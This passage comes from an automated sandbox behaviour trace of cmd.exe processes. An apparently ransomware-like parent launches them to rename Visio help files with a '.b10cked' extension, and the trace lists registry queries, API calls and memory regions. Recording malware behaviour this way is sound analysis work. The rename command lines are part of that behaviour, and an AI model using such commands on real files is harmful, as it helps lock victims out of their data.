lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.371] RegCloseKey (hKey=0x40) returned 0x0 [0202.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea44 | out: phkResult=0x12ea44*=0x40) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x0, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x9, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x9, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.372] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, 
lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x9, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.372] RegCloseKey (hKey=0x40) returned 0x0 [0202.372] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.372] srand (_Seed=0x5b8863a4) [0202.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"" [0202.372] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"" [0202.372] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.372] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a1900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.372] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.372] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.372] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.372] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.372] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.372] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.373] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.373] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.373] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 
[0202.373] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.373] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.373] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.373] GetEnvironmentStringsW () returned 0x1a22f0* [0202.373] FreeEnvironmentStringsW (penv=0x1a22f0) returned 1 [0202.373] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.373] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.373] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.373] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.373] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.373] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.373] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.373] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.373] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.373] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.373] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f810 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.373] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f810, lpFilePart=0x12f80c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f80c*="Desktop") returned 0x18 [0202.373] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.373] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f58c | out: lpFindFileData=0x12f58c) returned 0x1a0030 [0202.373] FindClose (in: hFindFile=0x1a0030 | out: hFindFile=0x1a0030) returned 1 [0202.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f58c | 
out: lpFindFileData=0x12f58c) returned 0x1a0030 [0202.374] FindClose (in: hFindFile=0x1a0030 | out: hFindFile=0x1a0030) returned 1 [0202.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f58c | out: lpFindFileData=0x12f58c) returned 0x1a0030 [0202.374] FindClose (in: hFindFile=0x1a0030 | out: hFindFile=0x1a0030) returned 1 [0202.374] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.374] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.374] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.374] GetEnvironmentStringsW () returned 0x1a2b10* [0202.374] FreeEnvironmentStringsW (penv=0x1a2b10) returned 1 [0202.374] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.375] GetConsoleOutputCP () returned 0x1b5 [0202.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.375] GetUserDefaultLCID () returned 0x409 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f950, cchData=128 | out: lpLCData="0") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f950, cchData=128 | out: lpLCData="0") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f950, cchData=128 | out: lpLCData="1") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | 
out: lpLCData="Tue") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.375] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.376] GetConsoleTitleW (in: lpConsoleTitle=0x1908f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.376] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.376] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.376] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.377] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.377] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.377] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.377] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.377] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.377] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.377] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.377] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.380] GetConsoleTitleW (in: 
lpConsoleTitle=0x12f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.380] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.380] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.380] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.380] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.380] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.380] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.380] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.380] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.380] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.380] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.380] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.380] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.380] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.380] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.380] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.380] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.381] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.381] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.381] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.381] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.381] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.381] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.381] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.381] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.381] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.381] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.381] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.381] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.381] _wcsicmp 
(_String1="move", _String2="SETLOCAL") returned -6 [0202.381] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.381] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.381] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.381] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.381] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.381] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.382] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f404, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.383] _wcsnicmp 
(_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.383] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.384] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", 
_String2=".") returned 63 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2="..") returned 63 [0202.384] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~4.hxn")) returned 0x2022 [0202.384] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a1e70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.384] SetErrorMode (uMode=0x0) returned 0x0 [0202.384] SetErrorMode (uMode=0x1) returned 0x0 [0202.384] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", nBufferLength=0x104, lpBuffer=0x12ed8c, lpFilePart=0x12ed74 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", lpFilePart=0x12ed74*="MSVISI~4.HXN") returned 0x27 [0202.384] SetErrorMode (uMode=0x0) returned 0x1 [0202.384] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2=".") returned 63 [0202.384] _wcsicmp (_String1="MSVISI~4.HXN", _String2="..") returned 63 [0202.384] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~4.hxn")) returned 0x2022 [0202.384] SetErrorMode (uMode=0x0) returned 0x0 [0202.384] SetErrorMode (uMode=0x1) returned 0x0 [0202.384] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", nBufferLength=0x104, lpBuffer=0x12f208, lpFilePart=0x12efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", lpFilePart=0x12efa0*="MSVISI~4.HXN") returned 0x27 [0202.384] SetErrorMode (uMode=0x0) returned 0x1 [0202.385] SetErrorMode (uMode=0x0) returned 0x0 [0202.385] SetErrorMode (uMode=0x1) returned 0x0 [0202.385] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f410, lpFilePart=0x12efa0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked", lpFilePart=0x12efa0*="MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked") returned 0x42 [0202.385] SetErrorMode (uMode=0x0) returned 0x1 [0202.385] SetLastError (dwErrCode=0x0) [0202.385] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio.shapesheet.14.1033.hxn.b10cked")) returned 0xffffffff [0202.385] GetLastError () returned 0x2 [0202.385] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e91c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e91c) returned 0x190eb8 [0202.385] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x12e91c | out: lpFindFileData=0x12e91c) returned 0 [0202.386] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.386] GetLastError () returned 0x12 [0202.386] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e91c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e91c) returned 0x190eb8 [0202.386] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x12e91c | out: lpFindFileData=0x12e91c) returned 0 [0202.386] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.386] GetLastError () returned 0x12 [0202.387] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1c10) returned 0x190eb8 [0202.387] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x1a1c10 | out: lpFindFileData=0x1a1c10) returned 0 [0202.387] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.388] GetLastError () returned 0x12 [0202.388] FindFirstFileExW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN", fInfoLevelId=0x1, lpFindFileData=0x1a1c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a1c10) returned 0x190eb8 [0202.388] FindNextFileW (in: hFindFile=0x190eb8, lpFindFileData=0x1a1c10 | out: lpFindFileData=0x1a1c10) returned 0 [0202.388] FindClose (in: hFindFile=0x190eb8 | out: hFindFile=0x190eb8) returned 1 [0202.654] GetLastError () returned 0x12 [0202.654] _get_osfhandle (_FileHandle=2) returned 0xb [0202.654] GetFileType (hFile=0xb) returned 0x2 [0202.654] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.654] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12eaec | out: lpMode=0x12eaec) returned 1 [0202.654] _get_osfhandle (_FileHandle=2) returned 0xb [0202.654] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eb20 | out: lpConsoleScreenBufferInfo=0x12eb20) returned 1 [0202.654] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.656] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eb60 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.656] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12eb44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eb44*=0x2c) returned 1 [0202.656] longjmp () [0202.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.657] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.657] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.657] SetConsoleInputExeNameW () returned 0x1 [0202.657] GetConsoleOutputCP () returned 0x1b5 [0202.657] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.657] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.657] exit (_Code=1) Process: id = "480" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d60" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29386 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29387 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29388 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29389 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29390 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = 
"\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29391 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29392 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29393 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29394 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 29395 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29782 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29783 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29784 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29785 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29786 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 29787 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = 